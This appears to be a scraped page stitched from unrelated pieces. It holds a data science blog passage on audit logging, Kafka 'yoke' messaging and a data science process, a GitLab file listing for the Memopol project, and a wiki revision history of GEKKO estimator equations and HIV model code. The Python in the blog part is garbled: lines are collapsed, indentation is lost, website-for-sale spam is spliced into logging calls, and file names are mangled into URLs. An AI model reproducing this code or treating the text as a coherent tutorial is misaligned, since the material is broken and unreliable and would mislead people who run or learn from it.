In the data science ecosystem, the audit consists of a series of observers that record preapproved processing indicators regarding the ecosystem. I have found the following to be good indicators for audit purposes.
### Built-in Logging
I advise you to design your logging into an organized preapproved location, to ensure that you capture every relevant log entry.
I also recommend that you do not change the internal or built-in logging process of any of the data science tools, as this will make any future upgrades complex and costly. I suggest that you handle the logs, in the same manner, you would any other data source.
Normally, I build a controlled systematic and independent examination of all the built-in logging vaults. That way, I am sure I can independently collect and process these logs across the ecosystem. I deploy five independent watchers for each logging location, as logging usually has the following five layers.
Debug Watcher
This is the maximum verbose logging level. If I discover any debug logs in my ecosystem, I normally raise an alarm, as this means that the tool is using precise processing cycles to perform low-level debugging.
Warning Tools running debugging should not be part of a production system.
### Information Watcher
The information level is normally utilized to output information that is beneficial to the running and management of a system. I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source.
Warning Watcher
The warning is often used for handled “exceptions” or other important log events. Usually, this means that the tool handled the issue and took corrective action for recovery.
I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add a warning to the Performing a Cause and Effect Analysis System data store. I will discuss this critical tool later in this blog.
#### Error Watcher
The error is used to log all unhandled exceptions in the tool. This is not a good state for the overall processing to be in, as it means that a specific step in the planned processing did not complete as expected. Now, the ecosystem must handle the issue and take corrective action for recovery.
I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add an error to the Performing a Cause and Effect Analysis System data store.
Fatal Watcher
Fatal is reserved for special exceptions/conditions for which it is imperative that you quickly identify these events. This is not a good state for the overall processing to be in, as it means a specific step in the planned processing has not completed as expected. This means the ecosystem must now handle the issue and take corrective action for recovery.
Once again, I pipe these logs to the central Audit, Balance, and Control data store, using the ecosystem as I would any other data source. I also add an error to the Performing a Cause and Effect Analysis System data store, which I will discuss later in this blog.
I have discovered that by simply using built-in logging and a good cause-and-effect analysis system, I can handle more than 95% of all issues that arise in the ecosystem.
Basic Logging
Following is a basic logging process I normally deploy in my data science. Open your Python editor and enter the following logging example. You will require the following libraries:
import sys
import os
import logging
import uuid
import shutil
import time
You next set up the basic ecosystem, as follows:
if sys.platform == 'linux':
Base=os.path.expanduser('~') + '/VKHCG'
else:
Base='C:/VKHCG'
You need the following constants to cover the ecosystem:
sCompanies=['01-Vermeulen','02-Krennwallner','03-Hillman','04-Clark']
sLayers=['01-Retrieve','02-Assess','03-Process','04-Transform','05-
Organise','06-Report']
sLevels=['debug','info','warning','error']
You can now build the loops to perform a basic logging run.
for sCompany in sCompanies: sFileDir=Base + '/' + sCompany if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
for sLayer in sLayers:
log = logging.getLogger() # root logger
for hdlr in log.handlers[:]: # remove all old handlers log.removeHandler(hdlr)
sFileDir=Base + '/' + sCompany + '/' + sLayer + '/Logging' if os.path.exists(sFileDir):
shutil.rmtree(sFileDir)
time.sleep(2)
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
skey=str(uuid.uuid4())
sLogFile=Base + '/' + sCompany + '/' + sLayer + '/Logging/
Logging_'+skey+'.log'
print('Set up:',sLogFile)
You set up logging to file, as follows:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s
%(message)s',
datefmt='%m-%d %H:%M',
filename=sLogFile,
filemode='w')
You define a handler, which writes all messages to sys.stderr.
console = logging.StreamHandler()
console.setLevel(logging.info - This website is for sale! - Logging Resources and Information.)
You set a format for console use.
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
You activate the handler to use this format.
console.setFormatter(formatter)
Now, add the handler to the root logger.
logging.info - This website is for sale! - Logging Resources and Information.('Practical Data Science is fun!.')
Test all the other levels.
for sLevel in sLevels:
sApp='Application-'+ sCompany + '-' + sLayer + '-' + sLevel logger = logging.getLogger(sApp)
if sLevel == 'debug':
logger.debug('Practical Data Science logged a debugging message.')
if sLevel == 'info':
logger.info('Practical Data Science logged information message.')
if sLevel == 'warning':
logger.warning('Practical Data Science logged a warning message.')
if sLevel == 'error':
logger.error('Practical Data Science logged an error message.')
This logging enables you to log everything that occurs in your data science processing to a central file, for each run of the process.
### Process Tracking
I normally build a controlled systematic and independent examination of the process for the hardware logging. There is numerous server-based software that monitors temperature sensors, voltage, fan speeds, and load and clock speeds of a computer system.
I suggest you go with the tool with which you and your customer are most comfortable. I do, however, advise that you use the logs for your cause-and-effect analysis system.
Data Provenance
Keep records for every data entity in the data lake, by tracking it through all the transformations in the system. This ensures that you can reproduce the data, if needed, in the future and supplies a detailed history of the data’s source in the system.
### Data Lineage
Keep records of every change that happens to the individual data values in the data lake. This enables you to know what the exact value of any data record was in the past. It is normally achieved by a valid-from and valid-to audit entry for each data set in the data science environment.
Balance
The balance sublayer ensures that the ecosystem is balanced across the accessible processing capability or has the capability to top up capability during periods of extreme processing. The processing on-demand capability of a cloud ecosystem is highly desirable for this purpose.
Tip Plan your capability as a combination of always-on and top-up processing.
By using the audit trail, it is possible to adapt to changing requirements and forecast what you will require to complete the schedule of work you submitted to the ecosystem. I have found that deploying a deeply reinforced learning algorithm against the cause-and- effect analysis system can handle any balance requirements dynamically.
Note In my experience, even the best pre-plan solution for processing will disintegrate against a good deep-learning algorithm, with reinforced learning capability handling the balance in the ecosystem.
Control
The control sublayer controls the execution of the currently active data science. The control elements are a combination of the control element within the Data Science Technology Stack’s individual tools plus a custom interface to control the overarching work.
The control sublayer also ensures that when processing experiences an error, it can try a recovery, as per your requirements, or schedule a clean-up utility to undo the error. The cause-and-effect analysis system is the core data source for the distributed control system in the ecosystem.
I normally use a distributed yoke solution to control the processing. I create an independent process that is created solely to monitor a specific portion of the data processing ecosystem control.
So, the control system consists of a series of yokes at each control point that uses Kafka messaging to communicate the control requests. The yoke then converts the requests into a process to execute and manage in the ecosystem.
The yoke system ensures that the distributed tasks are completed, even if it loses contact with the central services. The yoke solution is extremely useful in the Internet of things environment, as you are not always able to communicate directly with the data source.
#### Yoke Solution
The yoke solution is a custom design I have worked on over years of deployments. Apache Kafka is an open source stream processing platform developed to deliver a unified, high-throughput, low-latency platform for handling real-time data feeds. Kafka provides a publish-subscribe solution that can handle all activity-stream data and processing.
The Kafka environment enables you to send messages between producers and consumers that enable you to transfer control between different parts of your ecosystem while ensuring a stable process.
I will give you a simple example of the type of information you can send and receive.
Producer
The producer is the part of the system that generates the requests for data science processing, by creating structures messages for each type of data science process it requires. The producer is the end point of the pipeline that loads messages into Kafka.
Note This is for your information only. You do not have to code this and make it run.
from kafka import KafkaProducer
producer = KafkaProducer(bootstrap_servers='localhost:1234')
for _ in range(100):
producer.send('Retrieve', b'Person.csv')
# Block until a single message is sent (or timeout) future = producer.send('Retrieve', b'Last_Name.json') result = future.get(timeout=60)
# Block until all pending messages are at least put on the network
# NOTE: This does not guarantee delivery or success! It is really
# only useful if you configure internal batching using linger_ms
producer.flush()
# Use a key for hashed-partitioning producer.send('York', key=b'Retrieve', value=b'Run')
# Serialize json messages
import json
producer = KafkaProducer(value_serializer=lambda v: json.dumps(v). encode('utf-8'))
producer.send('Retrieve', {'Retrieve': 'Run'})
# Serialize string keys
producer = KafkaProducer(key_serializer=str.encode)
producer.send('Retrieve', key='ping', value=b'1234')
# Compress messages
producer = KafkaProducer(compression_type='gzip')
for i in range(1000):
producer.send('Retrieve', b'msg %d' % i)
### Consumer
The consumer is the part of the process that takes in messages and organizes them for processing by the data science tools. The consumer is the end point of the pipeline that offloads the messages from Kafka.
Note This is for your information only. You do not have to code this and make it run.
from kafka import KafkaConsumer
import msgpack
consumer = KafkaConsumer('Yoke')
for msg in consumer:
print (msg)
# join a consumer group for dynamic partition assignment and offset commits from kafka import KafkaConsumer
consumer = KafkaConsumer('Yoke', group_id='Retrieve') for msg in consumer:
print (msg)
# manually assign the partition list for the consumer from kafka import TopicPartition
consumer = KafkaConsumer(bootstrap_servers='localhost:1234') consumer.assign([TopicPartition('Retrieve', 2)])
msg = next(consumer)
# Deserialize msgpack-encoded values
consumer.subscribe(['Yoke'])
for msg in consumer:
assert isinstance(msg.value, dict)
### Directed Acyclic Graph Scheduling
This solution uses a combination of graph theory and publish-subscribe stream data processing to enable scheduling.
You can use the Python NetworkX library to resolve any conflicts, by simply formulating the graph into a specific point before or after you send or receive messages via Kafka. That way, you ensure an effective and efficient processing pipeline.
A tip I normally publish the request onto three different message queues, to ensure that the pipeline is complete. The extra redundancy outweighs the extra processing, as the message is typically very small.
Yoke Example
Following is a simple simulation of what I suggest you perform with your processing. Open your Python editor and create the following three parts of the yoke processing pipeline:
Create a file called http://Run-Yoke.py in directory ..\VKHCG\77-Yoke.
Enter this code into the file and save it.
# -*- coding: utf-8 -*-
import sys
import os
import shutil
def prepecosystem():
if sys.platform == 'linux':
Base=os.path.expanduser('~') + '/VKHCG'
else:
Base='C:/VKHCG'
sFileDir=Base + '/77-Yoke'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/10-Master'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/20-Slave'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
return Base
def makeslavefile(Base,InputFile):
sFileNameIn=Base + '/77-Yoke/10-Master/'+InputFile
sFileNameOut=Base + '/77-Yoke/20-Slave/'+InputFile
if os.path.isfile(sFileNameIn):
shutil.move(sFileNameIn,sFileNameOut) if __name__ == '__main__':
print('### Start ############################################') Base = prepecosystem()
sFiles=list(sys.argv)
for sFile in sFiles:
if sFile != 'http://Run-Yoke.py':
print(sFile)
makeslavefile(Base,sFile)
print('### Done!! ############################################')
Next, create the Master Producer Script. This script will place nine files in the master message queue simulated by a directory called 10-Master.
Create a file called http://Master-Yoke.py in directory ..\VKHCG\77-Yoke.
# -*- coding: utf-8 -*-
import sys import os
import sqlite3 as sq from http://pandas.io import sql import uuid
import re
from multiprocessing import Process
def prepecosystem():
if sys.platform == 'linux': Base=os.path.expanduser('~') + '/VKHCG'
else:
Base='C:/VKHCG'
sFileDir=Base + '/77-Yoke'
if not os.path.exists(sFileDir): os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/10-Master' if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/20-Slave'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/99-SQLite'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sDatabaseName=Base + '/77-Yoke/99-SQLite/Yoke.db' conn = sq.connect(sDatabaseName) print('Connecting :',sDatabaseName) sSQL='CREATE TABLE IF NOT EXISTS YokeData (\ PathFileName VARCHAR (1000) NOT NULL\
);'
sql.execute(sSQL,conn)
conn.commit()
conn.close()
return Base,sDatabaseName
def makemasterfile(sseq,Base,sDatabaseName): sFileName=Base + '/77-Yoke/10-Master/File_' + sseq +\ '_' + str(uuid.uuid4()) + '.txt' sFileNamePart=os.path.basename(sFileName) smessage="Practical Data Science Yoke \n File: " + sFileName with open(sFileName, "w") as txt_file:
txt_file.write(smessage)
connmerge = sq.connect(sDatabaseName)
sSQLRaw="INSERT OR REPLACE INTO YokeData(PathFileName)\
VALUES\
('" + sFileNamePart + "');"
sSQL=re.sub('\s{2,}', ' ', sSQLRaw)
sql.execute(sSQL,connmerge)
connmerge.commit()
connmerge.close()
if __name__ == '__main__':
print('### Start ############################################') Base,sDatabaseName = prepecosystem()
for t in range(1,10):
sFile='{num:06d}'.format(num=t)
print('Spawn:',sFile)
p = Process(target=makemasterfile, args=(sFile,Base,sDatabaseName))
p.start()
p.join()
print('### Done!! ##########')
Execute the master script to load the messages into the yoke system.
Next, create the Slave Consumer Script. This script will place nine files in the master message queue simulated by a directory called 20-Slave. Create a file called http://Slave-Yoke.py in the directory ..\VKHCG\77-Yoke.
# -*- coding: utf-8 -*-
import sys import os
import sqlite3 as sq from http://pandas.io import sql import pandas as pd
from multiprocessing import Process
def prepecosystem():
if sys.platform == 'linux': Base=os.path.expanduser('~') + '/VKHCG'
else:
Base='C:/VKHCG'
sFileDir=Base + '/77-Yoke'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/10-Master'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/20-Slave'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sFileDir=Base + '/77-Yoke/99-SQLite'
if not os.path.exists(sFileDir):
os.makedirs(sFileDir)
sDatabaseName=Base + '/77-Yoke/99-SQLite/Yoke.db' conn = sq.connect(sDatabaseName) print('Connecting :',sDatabaseName) sSQL='CREATE TABLE IF NOT EXISTS YokeData (\ PathFileName VARCHAR (1000) NOT NULL\
);'
sql.execute(sSQL,conn)
conn.commit()
conn.close()
return Base,sDatabaseName
def makeslavefile(Base,InputFile): sExecName=Base + '/77-Yoke/Run-Yoke.py' sExecLine='python ' + sExecName + ' ' + InputFile os.system(sExecLine)
if __name__ == '__main__':
print('### Start ############################################') Base,sDatabaseName = prepecosystem()
connslave = sq.connect(sDatabaseName) sSQL="SELECT PathFileName FROM YokeData;" SlaveData=pd.read_sql_query(sSQL, connslave) for t in range(SlaveData.shape[0]):
sFile=str(SlaveData['PathFileName'][t])
print('Spawn:',sFile)
p = Process(target=makeslavefile, args=(Base,sFile))
p.start()
p.join()
print('### Done!! ############################################')
Execute the script and observe the slave script retrieving the messages and then using the Run-Yoke to move the files between the 10-Master and 20-Slave directories.
This is a simulation of how you could use systems such as Kafka to send messages via a producer and, later, via a consumer to complete the process, by retrieving the messages and executing another process to handle the data science processing.
Well done, you just successfully simulated a simple message system.
Tip In this manner, I have successfully passed messages between five data centers across four time zones. It is worthwhile to invest time and practice to achieve a high level of expertise with using messaging solutions.
#### Cause-and-Effect Analysis System
The cause-and-effect analysis system is the part of the ecosystem that collects all the logs, schedules, and other ecosystem-related information and enables data scientists to evaluate the quality of their system.
Advice Apply the same data science techniques to this data set, to uncover the insights you need to improve your data science ecosystem.
You have now successfully completed the management sections of the ecosystem. I will now introduce the core data science process for this blog.
#### Functional Layer
The functional layer of the data science ecosystem is the largest and most essential layer for programming and modeling. Any data science project must have processing elements in this layer.
The layer performs all the data processing chains for the practical data science. Before I officially begin the discussion of the functional layer, I want to share my successful fundamental data science process.
#### Data Science Process
Following are the five fundamental data science process steps that are the core of my approach to practical data science.
Decide what you want to know, even if it is only the subset of the data lake you want to use for your data science, which is a good start.
For example, let’s consider the example of a small car dealership. Suppose I have been informed that Bob was looking at cars last weekend. Therefore, I ask: “What if I know what car my customer Bob will buy next?”
Take a Guess at a Potential Pattern
Use your experience or insights to guess a pattern you want to discover, to uncover additional insights from the data you already have.
For example, I guess Bob will buy a car every three years, and as he currently owns a three-year-old Audi, he will likely buy another Audi. I have no proof; it’s just a guess or so-called gut feeling. Something I could prove via my data science techniques.
Gather Observations and Use Them to Produce a Hypothesis
So, I start collecting car-buying patterns on Bob and formulate a hypothesis about his future behavior. For those of you who have not heard of a hypothesis, it is a proposed explanation, prepared on the basis of limited evidence, as a starting point for further investigation.
“I saw Bob looking at cars last weekend in his Audi” then becomes “Bob will buy an Audi next, as his normal three-year buying cycle is approaching.”
#### Use Real-World Evidence to Verify the Hypothesis
Now, we verify our hypothesis with real-world evidence. On our CCTV, I can see that Bob is looking only at Audis and returned to view a yellow Audi R8 five times over the last two weeks. On the sales ledger, I see that Bob bought an Audi both three years previous and six previous. Bob’s buying pattern, then, is every three years.
So, our hypothesis is verified. Bob wants to buy my yellow Audi R8. Collaborate Promptly and Regularly with Customers and Subject Matter Experts As You Gain Insights. The moment I discover Bob’s intentions, I contact the salesperson, and we successfully sell Bob the yellow Audi R8.
These five steps work, but I will acknowledge that they serve only as my guide while prototyping. Once you start working with massive volumes, velocities, and variance in data, you will need a more structured framework to handle the data science.
So, let’s discuss the functional layer of the framework in more detail.
As previously mentioned, the functional layer of the data science ecosystem is the largest and most essential layer for programming and modeling. The functional layer is the part of the ecosystem that runs the comprehensive data science ecosystem.
Warning When database administrators refer to a data model, they are referring to data schemas and data formats in the data science world.
Data science views data models as a set of algorithms and processing rules applied as part of data processing pipelines. So, make sure that when you talk to people, they are clear on what you are talking about in all communications channels.
It consists of several structures, as follows:
Data schemas and data formats: Functional data schemas and data formats deploy onto the data lake’s raw data, to perform the required schema-on-query via the functional layer.
Data models: These form the basis for future processing to enhance the processing capabilities of the data lake, by storing already processed data sources for future use by other processes against the data lake.
Processing algorithms: The functional processing is performed via a series of well-designed algorithms across the processing chain.
Provisioning of infrastructure: The functional infrastructure provision enables the framework to add processing capability to the ecosystem, using technology such as Apache Mesos, which enables the dynamic provisioning of processing work cells.
The processing algorithms and data models are spread across six super steps for processing the data lake.
\ 1.\ Retrieve
This super step contains all the processing chains for retrieving data from the raw data lake into a more structured format.
\ 2.\ Assess
This super step contains all the processing chains for quality assurance and additional data enhancements.
\ 3.\ Process
This super step contains all the processing chains for building the data vault.
\ 4.\ Transform
This super step contains all the processing chains for building the data warehouse from the core data vault.
\ 5.\ Organize
This super step contains all the processing chains for building the data marts from the core data warehouse.
\ 6.\ Report
This super step contains all the processing chains for building virtualization and reporting of the actionable knowledge.
These six supersteps, discussed in detail in individual blogs devoted to them, enable the reader to master both them and the relevant tools from the Data Science Technology Stack.
### Recommend
© Copyright @ Thesis Scientist Pvt. Ltd. Terms & Conditions | Refund Policy | Tips & Tricks
|
|
misc.html 6.39 KB
quota_atypique committed Jan 08, 2015 1 2 3 4 5 6 7 8 9 10 Memopol Project okhin committed Oct 13, 2016 11 12 13 14 quota_atypique committed Jan 08, 2015 15 16 okhin committed Oct 13, 2016 17 quota_atypique committed Jan 08, 2015 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
misc
okhin committed Oct 13, 2016 112
What is Memopol ?
quota_atypique committed Jan 08, 2015 113 okhin committed Oct 13, 2016 114
Written by Memopol Team on 01/01/2015.
quota_atypique committed Jan 08, 2015 115
Political Memory is a tool designed by La Quadrature du Net to help European citizens to reach members of European Parliament (MEPs) and track their voting records on issues related to fundamental freedoms online.
okhin committed Oct 13, 2016 116
quota_atypique committed Jan 08, 2015 117 118 119 120 121 122 123 124
okhin committed Oct 13, 2016 167 168 quota_atypique committed Jan 08, 2015 169 170 171 172 173
|
|
## Main.EstimatorObjective History
March 19, 2019, at 02:56 PM by 10.35.117.63 -
Changed line 91 from:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2.
to:
The spread of HIV in a patient is approximated with balance equations on (H)ealthy, (I)nfected, and (V)irus population counts2. Additional information on the HIV model is at the Process Dynamic and Control Course.
Changed line 67 from:
$$x,u,p=\mathrm{states,\,inputs,\,parameters}$$
to:
$$x,y,p=\mathrm{states,\,outputs,\,parameters}$$
Changed lines 39-41 from:
$$\Delta p_U \ge p - \hat p$$
$$\Delta p_L \ge \hat p - p$$
to:
$$\Delta p_U \ge p_i - p_{i-1}$$
$$\Delta p_L \ge p_{i-1} - p_i$$
Changed lines 11-12 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T c_{\Delta p} \Delta p$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T W_{\Delta p} \Delta p$$
Changed line 63 from:
$$c_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
to:
$$w_{\Delta p},W_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
Changed line 55 from:
$$y=\mathrm{\mathrm{model\,predictions}$$
to:
$$y=\mathrm{model\,predictions}$$
Changed lines 51-77 from:
$$\Phi = \mathrm{Objective\,Function}$$
$$y_x$$ = measurements
$$y$$ = model predictions
$$\hat y$$ = prior model values
$$w_x, W_x$$ = measurement deviation penalty (WMEAS)
$$w_m, W_m$$ = prior prediction deviation penalty (WMODEL)
$$c_{\Delta p}$$ = parameter movement penalty (DCOST)
$$db$$ = dead-band for noise rejection
$$x,u,p$$ = states, inputs, parameters
$$\Delta p$$ = parameter change
$$f,g$$ = equality and inequality constraints
$$e_U,e_L$$ = upper and lower error outside dead-band
$$c_U,c_L$$ = upper and lower deviation from prior model prediction
$$\Delta p_U,\Delta p_L$$ = upper and lower parameter change
to:
$$\Phi=\mathrm{Objective\,Function}$$
$$y_x=\mathrm{measurements}$$
$$y=\mathrm{\mathrm{model\,predictions}$$
$$\hat y=\mathrm{prior\,model\,values}$$
$$w_x, W_x=\mathrm{measurement\,deviation\,penalty\,(WMEAS)}$$
$$w_m, W_m=\mathrm{prior\,prediction\,deviation\,penalty\,(WMODEL)}$$
$$c_{\Delta p}=\mathrm{parameter\,movement\,penalty\,(DCOST)}$$
$$db=\mathrm{dead-band\,for\,noise\,rejection}$$
$$x,u,p=\mathrm{states,\,inputs,\,parameters}$$
$$\Delta p=\mathrm{parameter\,change}$$
$$f,g=\mathrm{equality\,and\,inequality\,constraints}$$
$$e_U,e_L=\mathrm{upper\,and\,lower\,error\,outside\,dead-band}$$
$$c_U,c_L=\mathrm{upper\,and\,lower\,deviation\,from\,prior\,model\,prediction}$$
$$\Delta p_U,\Delta p_L=\mathrm{upper\,and\,lower\,parameter\,change}$$
Changed line 51 from:
$$\Phi = \mathrm{Objective Function}$$
to:
$$\Phi = \mathrm{Objective\,Function}$$
Changed line 51 from:
$$\Phi$$ = Objective Function
to:
$$\Phi = \mathrm{Objective Function}$$
Changed lines 51-77 from:
to:
$$\Phi$$ = Objective Function
$$y_x$$ = measurements
$$y$$ = model predictions
$$\hat y$$ = prior model values
$$w_x, W_x$$ = measurement deviation penalty (WMEAS)
$$w_m, W_m$$ = prior prediction deviation penalty (WMODEL)
$$c_{\Delta p}$$ = parameter movement penalty (DCOST)
$$db$$ = dead-band for noise rejection
$$x,u,p$$ = states, inputs, parameters
$$\Delta p$$ = parameter change
$$f,g$$ = equality and inequality constraints
$$e_U,e_L$$ = upper and lower error outside dead-band
$$c_U,c_L$$ = upper and lower deviation from prior model prediction
$$\Delta p_U,\Delta p_L$$ = upper and lower parameter change
Changed line 11 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} \Delta p + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_x \left(y_x-y\right) + \left(y-\hat y\right)^T W_m \left(y-\hat y\right) + \Delta p^T c_{\Delta p} \Delta p$$
Changed lines 23-24 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
to:
$$\min_{x,y,p} \Phi = w_x^T \left(e_U+e_L\right) + w_m^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
Changed lines 39-43 from:
$$e_U, e_L, c_U, c_L \ge 0$$
to:
$$\Delta p_U \ge p - \hat p$$
$$\Delta p_L \ge \hat p - p$$
$$e_U, e_L, c_U, c_L, \Delta p_U, \Delta p_L \ge 0$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \left| \Delta p \right|^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + w_{\Delta p}^T \left(\Delta p_U+\Delta p_L\right)$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \left| \Delta p \right|^T c_{\Delta p}$$
Changed lines 11-12 from:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} \Delta p + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p} \Delta p$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
Changed line 23 from:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p} \Delta p$$
Changed line 37 from:
$$c_U \ge \hat y - y$$
to:
$$c_L \ge \hat y - y$$
June 08, 2018, at 03:50 AM by 45.56.3.173 -
Changed lines 31-33 from:
$$e_U \ge y_{pred} - y_{meas} - \frac{db}{2}$$
$$e_L \ge y_{meas} - y_{pred} - \frac{db}{2}$$
to:
$$e_U \ge y - y_x - \frac{db}{2}$$
$$e_L \ge y_x - y - \frac{db}{2}$$
June 08, 2018, at 03:47 AM by 45.56.3.173 -
Changed lines 11-14 from:
$$\min_{x,y,p,d} \Phi$$
$$\Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
to:
$$\min_{x,y,p} \Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
$$\mathrm{subject\;\;to}$$
$$0 = f\left(\frac{dx}{dt},x,y,p\right)$$
$$0 \le g\left(\frac{dx}{dt},x,y,p\right)$$
Changed lines 23-39 from:
to:
$$\min_{x,y,p} \Phi = w_m^T \left(e_U+e_L\right) + w_p^T \left(c_U+c_L\right) + \Delta p^T c_{\Delta p}$$
$$\mathrm{subject\;\;to}$$
$$0 = f\left(\frac{dx}{dt},x,y,p\right)$$
$$0 \le g\left(\frac{dx}{dt},x,y,p\right)$$
$$e_U \ge y_{pred} - y_{meas} - \frac{db}{2}$$
$$e_L \ge y_{meas} - y_{pred} - \frac{db}{2}$$
$$c_U \ge y - \hat y$$
$$c_U \ge \hat y - y$$
$$e_U, e_L, c_U, c_L \ge 0$$
June 08, 2018, at 02:17 AM by 45.56.3.173 -
Changed lines 11-13 from:
to:
$$\min_{x,y,p,d} \Phi$$
$$\Phi = \left(y_x-y\right)^T W_m \left(y_x-y\right) + \Delta p^T c_{\Delta p} + \left(y-\hat y\right)^T W_p \left(y-\hat y\right)$$
Changed line 153 from:
log_v = data[:,][:,1] # 2nd column of data
to:
log_v = data[:,1] # 2nd column of data
Changed line 123 from:
for i in range(6):
to:
for i in range(5):
January 24, 2018, at 12:16 AM by 10.37.134.137 -
Added lines 78-175:
(:toggle hide gekko button show="Show GEKKO (Python) Code":) (:div id=gekko:) (:source lang=python:) from __future__ import division from gekko import GEKKO import numpy as np
1. Manually enter guesses for parameters
lkr = [3,np.log10(0.1),np.log10(2e-7), np.log10(0.5),np.log10(5),np.log10(100)]
1. Model
m = GEKKO()
1. Time
m.time = np.linspace(0,15,61)
1. Parameters to estimate
lg10_kr = [m.FV(value=lkr[i]) for i in range(6)]
1. Variables
kr = [m.Var() for i in range(6)] H = m.Var(value=1e6) I = m.Var(value=0) V = m.Var(value=1e2)
1. Variable to match with data
LV = m.CV(value=2)
1. Equations
m.Equations([10**lg10_kr[i]==kr[i] for i in range(6)]) m.Equations([H.dt() == kr[0] - kr[1]*H - kr[2]*H*V,
I.dt() == kr[2]*H*V - kr[3]*I,
V.dt() == -kr[2]*H*V - kr[4]*V + kr[5]*I,
LV == m.log10(V)])
1. Estimation
2. Global options
m.options.IMODE = 5 #switch to estimation m.options.TIME_SHIFT = 0 #don't timeshift on new solve m.options.EV_TYPE = 2 #l2 norm m.options.COLDSTART = 2 m.options.SOLVER = 1 m.options.MAX_ITER = 1000
m.solve()
for i in range(6):
lg10_kr[i].STATUS = 1 #Allow optimizer to fit these values
lg10_kr[i].DMAX = 2
lg10_kr[i].LOWER = -10
lg10_kr[i].UPPER = 10
1. patient virus count data
data = np.array()
1. Convert log-scaled data for plotting
log_v = data[:,][:,1] # 2nd column of data v = np.power(10,log_v)
LV.FSTATUS = 1 #receive measurements to fit LV.STATUS = 1 #build objective function to match data and prediction LV.value = log_v #v data
m.solve()
1. Plot results
import matplotlib.pyplot as plt plt.figure(1) plt.semilogy(m.time,H,'b-') plt.semilogy(m.time,I,'g:') plt.semilogy(m.time,V,'r--') plt.semilogy(data[:,][:,0],v,'ro') plt.xlabel('Time (yr)') plt.ylabel('States (log scale)') plt.legend(['H','I','V']) plt.show() (:sourceend:) (:divend:)
Changed line 25 from:
to:
Changed lines 11-12 from:
to:
Added lines 14-15:
The l1-norm objective is like an absolute value objective but also includes a dead-band to reject measurement error and stabilize the parameter estimates.
Changed lines 11-12 from:
to:
Changed lines 15-16 from:
to:
Changed line 23 from:
to:
Changed line 78 from:
1. # Safdarnejad, S.M., Hedengren, J.D., Lewis, N.R., Haseltine, E., Initialization Strategies for Optimization of Dynamic Systems, Computers and Chemical Engineering, 2015, Vol. 78, pp. 39-50, DOI: 10.1016/j.compchemeng.2015.04.016. Article
to:
